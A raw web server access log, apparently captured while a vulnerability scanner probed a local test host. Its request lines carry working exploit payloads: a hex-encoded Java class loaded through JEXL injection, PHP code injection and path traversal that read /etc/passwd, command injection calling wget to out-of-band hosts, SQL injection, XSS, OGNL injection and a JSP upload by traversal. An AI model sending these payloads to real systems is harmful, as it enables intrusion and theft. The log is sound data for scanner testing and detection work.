97073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \x5CndefineClass.setAccessible(true);\x5Cnx=defineClass.invoke(\x5Cn y,\x5Cn 'Exploit.Test234',\x5Cn z.getBytes('latin1'), 0,\x5Cn 3054\x5Cn);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\x5Cn\x22}, {\x22property\x22: \x22type\x22, \x22value\x22: \x22jexl\x22}], \x22limit\x22: 50, \x22page\x22: 1}], \x22method\x22: \x22previewAssets\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/extdirect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/42 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://ca2u0eosmpv1jhs80ca0m6yr8nhjrxwpy.oast.fun`;busybox wget http://ca2u0eosmpv1jhs80ca0ywidz6fwiuosp.oast.fun&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /net/net/net.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"29N5mBkEfWee0tSiyrqU3gEZGUj","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /embed.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"username=admin&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /htdocs/login/login.lua HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/43 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://ca2u0eosmpv1jhs80ca03dtwieqbgmutc.oast.fun`;wget http://ca2u0eosmpv1jhs80ca0ihx1s45sxxthp.oast.fun&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"--------------------------aadc326f7ae3eac3\x0D\x0AContent-Disposition: form-data; name=\x22name\x22; filename=\x22../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/29N5m5Y0hKKL5GMBmsKNxlG5FR9.jsp\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<%\x0D\x0Aout.println(\x22CVE-2022-26352\x22);\x0D\x0A%>\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"&uid=10; wget http://ca2u0eosmpv1jhs80ca0wbwme3gp4anmr.oast.fun","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /telescope/requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/44 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5m5Y0hKKL5GMBmsKNxlG5FR9.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 